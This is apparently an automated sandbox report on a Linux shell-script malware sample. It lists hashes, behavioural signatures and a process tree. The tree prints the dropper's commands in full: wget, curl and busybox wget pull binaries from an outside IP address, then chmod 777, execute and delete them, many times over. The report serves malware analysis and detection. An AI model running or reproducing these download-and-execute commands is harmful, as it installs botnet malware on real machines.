Analysis
-
max time kernel
31s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
24/11/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh
-
Size
10KB
-
MD5
b8957a4d872db8549e6dd376ab9dafcc
-
SHA1
92bd1f467ac4ee061f16287c03b87e0b08bd1ec7
-
SHA256
f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b
-
SHA512
dc72ec24cf00f2137c1523a199d86c0c507173013220d9b44f0304ff2ef9c1086fdce94d435aeaca9f68818b7af05083109fc3c2eaf99a341fa00838d393a406
-
SSDEEP
192:YiiT1B9dLJyOdggODXRA13TP9dLJyOLggODXm3TQX:YiiT1B9dLJyOgA1P9dLJyOhQX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1650 chmod 1656 chmod 1542 chmod 1536 chmod 1614 chmod 1662 chmod 1688 chmod 1524 chmod 1590 chmod 1596 chmod 1602 chmod 1682 chmod 1548 chmod 1578 chmod 1638 chmod 1572 chmod 1668 chmod 1566 chmod 1560 chmod 1584 chmod 1632 chmod 1554 chmod 1608 chmod 1620 chmod 1626 chmod 1676 chmod 1530 chmod 1644 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 1525 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M 1531 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm 1537 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an 1543 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ 1549 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh 1555 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC 1561 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 1567 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 1573 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB 1579 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a 1585 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ 1591 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo 1597 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R 1603 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ 1609 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh 1615 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC 1621 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 1627 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 1633 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB 1639 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a 1645 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ 1651 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo 1657 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R 1663 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 1669 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M 1677 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm 1683 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an 1689 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1569 wget 1571 busybox 1574 rm 1629 wget 1631 busybox 1633 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 1570 curl 1573 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q 1630 curl 1634 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R curl File opened for modification /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 curl File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh curl File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC curl File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q curl File opened for modification /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R curl File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 curl File opened for modification /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 curl File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo curl File opened for modification /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 curl File opened for modification /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M curl File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ curl File opened for modification /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh curl File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB curl File opened for modification /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ curl File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a curl File opened for modification /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an curl File opened for modification /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB curl File opened for modification /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M curl File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ curl File opened for modification /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ curl File opened for modification /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q curl File opened for modification /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a curl File opened for modification /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an curl File opened for modification /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC curl File opened for modification /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm curl File opened for modification /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo curl File opened for modification /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm curl
Processes
-
/tmp/f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh/tmp/f3f655ce4ae3e3be7099c7b54b29af3465cbd0e2d746e0f2664144570220bc5b.sh1⤵PID:1516
-
/bin/rm/bin/rm bins.sh2⤵PID:1517
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:1518
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Writes file to tmp directory
PID:1522
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:1523
-
-
/bin/chmodchmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Executes dropped EXE
PID:1525
-
-
/bin/rmrm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:1526
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:1527
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:1529
-
-
/bin/chmodchmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Executes dropped EXE
PID:1531
-
-
/bin/rmrm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:1532
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1533
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1535
-
-
/bin/chmodchmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- File and Directory Permissions Modification
PID:1536
-
-
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Executes dropped EXE
PID:1537
-
-
/bin/rmrm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1538
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:1539
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Writes file to tmp directory
PID:1540
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:1541
-
-
/bin/chmodchmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Executes dropped EXE
PID:1543
-
-
/bin/rmrm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:1544
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:1545
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Writes file to tmp directory
PID:1546
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:1547
-
-
/bin/chmodchmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- File and Directory Permissions Modification
PID:1548
-
-
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Executes dropped EXE
PID:1549
-
-
/bin/rmrm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:1550
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:1551
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:1553
-
-
/bin/chmodchmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Executes dropped EXE
PID:1555
-
-
/bin/rmrm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:1556
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:1557
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Writes file to tmp directory
PID:1558
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:1559
-
-
/bin/chmodchmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Executes dropped EXE
PID:1561
-
-
/bin/rmrm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:1562
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:1563
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Writes file to tmp directory
PID:1564
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:1565
-
-
/bin/chmodchmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- File and Directory Permissions Modification
PID:1566
-
-
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Executes dropped EXE
PID:1567
-
-
/bin/rmrm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:1568
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:1569
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1570
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:1571
-
-
/bin/chmodchmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1573
-
-
/bin/rmrm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:1574
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:1575
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:1577
-
-
/bin/chmodchmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- File and Directory Permissions Modification
PID:1578
-
-
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Executes dropped EXE
PID:1579
-
-
/bin/rmrm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:1580
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:1581
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:1583
-
-
/bin/chmodchmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Executes dropped EXE
PID:1585
-
-
/bin/rmrm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:1586
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:1587
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:1589
-
-
/bin/chmodchmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/rmrm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:1592
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:1593
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:1595
-
-
/bin/chmodchmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Executes dropped EXE
PID:1597
-
-
/bin/rmrm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:1598
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:1599
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:1601
-
-
/bin/chmodchmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:1604
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:1605
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:1607
-
-
/bin/chmodchmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ2⤵PID:1610
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:1613
-
-
/bin/chmodchmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh2⤵PID:1616
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:1619
-
-
/bin/chmodchmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC2⤵PID:1622
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:1623
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:1625
-
-
/bin/chmodchmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei22⤵PID:1628
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:1629
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1630
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:1631
-
-
/bin/chmodchmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1633
-
-
/bin/rmrm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q2⤵
- System Network Configuration Discovery
PID:1634
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:1635
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Writes file to tmp directory
PID:1636
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:1637
-
-
/bin/chmodchmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- File and Directory Permissions Modification
PID:1638
-
-
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Executes dropped EXE
PID:1639
-
-
/bin/rmrm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:1640
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:1641
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:1643
-
-
/bin/chmodchmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Executes dropped EXE
PID:1645
-
-
/bin/rmrm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:1646
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:1647
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Writes file to tmp directory
PID:1648
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:1649
-
-
/bin/chmodchmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Executes dropped EXE
PID:1651
-
-
